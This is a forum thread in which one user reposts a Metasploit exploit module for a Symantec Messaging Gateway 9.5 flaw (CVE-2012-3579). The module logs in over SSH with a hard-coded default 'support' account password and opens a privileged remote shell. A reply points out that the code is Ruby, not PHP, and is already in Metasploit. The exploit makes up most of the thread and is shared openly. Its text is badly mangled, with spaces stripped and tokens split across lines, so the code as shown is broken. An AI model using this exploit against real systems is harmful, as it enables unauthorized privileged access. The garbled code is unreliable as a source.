Symantec Messaging Gateway / SSH Default Password Security Bypass Vulnerability

Stricker · 10-23-2012, 11:33 AM

PHP Code:
##
#ThisfileispartoftheMetasploit
Frameworkandmaybesubjectto
#redistributionandcommercial
restrictions.Pleaseseethe
Metasploit
#Frameworkwebsiteformore
informationonlicensingandtermsof
use.
# http://metasploit.com/framework/
##

require'msf/core'
require'net/ssh'
classMetasploit3<
Msf::Exploit::Remote
Rank=ExcellentRanking
includeMsf::Auxiliary::CommandShell
definitialize(info={})
super(update_info(info,
'Name' =>"Symantec
MessagingGateway9.5DefaultSSH
PasswordVulnerability",
'Description' =>%q{
Thismoduleexploitsa
defaultmisconfigurationflawon
SymantecMessagingGateway.
The'support'userhasaknown
defaultpassword,whichcanbeusedto
logintothe
SSHservice,andgain
privilegedaccessfromremote.
},
'License' =>MSF_LICENSE,
'Author' =>
[
'StefanViehbock',
#Originaldiscovery
'BenWilliams',
#Reportingthevuln+coordinated
release
'sinn3r'
#Metasploit
],
'References' =>
[
['CVE', '2012-3579'],
['OSVDB','85028'],
['BID', '55143'],
['URL', 'https://www.sec-
consult.com/
files/20120829-0_Symantec_Mail_Gateway_Support_Backdoor.txt'],
['URL', 'http://
www.symantec.com/security_response/
securityupdates/detail.jsp?
fid=security_advisory&pvid=security_advisory&suid=20120827_00']
],
'DefaultOptions' =>
{
'ExitFunction'=>"none"
},
'Payload' =>
{
'Compat'=>{
'PayloadType' =>
'cmd_interact',
'ConnectionType'=>'find'
}
},
'Platform' =>'unix',
'Arch' =>ARCH_CMD,
'Targets' =>
[
['SymantecMessagingGateway
9.5',{}],
],
'Privileged' =>true,
#TimestamponSymantecadvisory
#ButwasfoundonJun26,2012
'DisclosureDate'=>"Aug27
2012",
'DefaultTarget' =>0))
register_options(
[
Opt::RHOST(),
Opt::RPORT(22)
],self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG',[
false,'EnableSSHdebuggingoutput
(Extremeverbosity!)',false]),
OptInt.new('SSH_TIMEOUT',[
false,'Specifythemaximumtimeto
negotiateaSSHsession',30])
]
)
end
defrhost
datastore['RHOST']
end
defrport
datastore['RPORT']
end
defdo_login(user,pass)
opts={
:auth_methods=>['password',
'keyboard-interactive'],
:msframework =>framework,
:msfmodule =>self,
:port =>rport,
:disable_agent=>true,
:config=>false,
:password=>pass,
:record_auth_info=>true,
:proxies=>datastore['Proxies']
}
opts.merge!(:verbose=>:debug)
ifdatastore['SSH_DEBUG']
begin
ssh=nil
::Timeout.timeout(datastore
['SSH_TIMEOUT'])do
ssh=Net::SSH.start(rhost,
user,opts)
end
rescueRex::ConnectionError,
Rex::AddressInUse
return
rescue
Net::SSH::Disconnect,::EOFError
print_error"#{rhost}:#{rport}
SSH-Disconnectedduringnegotiation"
return
rescue::Timeout::Error
print_error"#{rhost}:#{rport}
SSH-Timedoutduringnegotiation"
return
rescue
Net::SSH::AuthenticationFailed
print_error"#{rhost}:#{rport}
SSH-Failedauthentication"
rescueNet::SSH::Exception=>e
print_error"#{rhost}:#{rport}
SSHError:#{e.class}:#{e.message}"
return
end
ifssh
conn=
Net::SSH::CommandStream.new(ssh,'/
bin/sh',true)
ssh=nil
returnconn
end
returnnil
end
defexploit
user='support'
pass='symantec'
print_status("#{rhost}:#{rport}-
Attempttologin...")
conn=do_login(user,pass)
ifconn
print_good("#{rhost}:#{rport}-
LoginSuccessfulwith'#{user}:#
{pass}'")
handler(conn.lsock)
end
end
en d 

chmod · 10-23-2012, 11:52 AM

This is just a metasploit exploit anyone who has the framework (which is required to run it) will already have this also its written in ruby not PHP

Stricker · 10-23-2012, 01:02 PM

Ok bro,thanks for info... Smile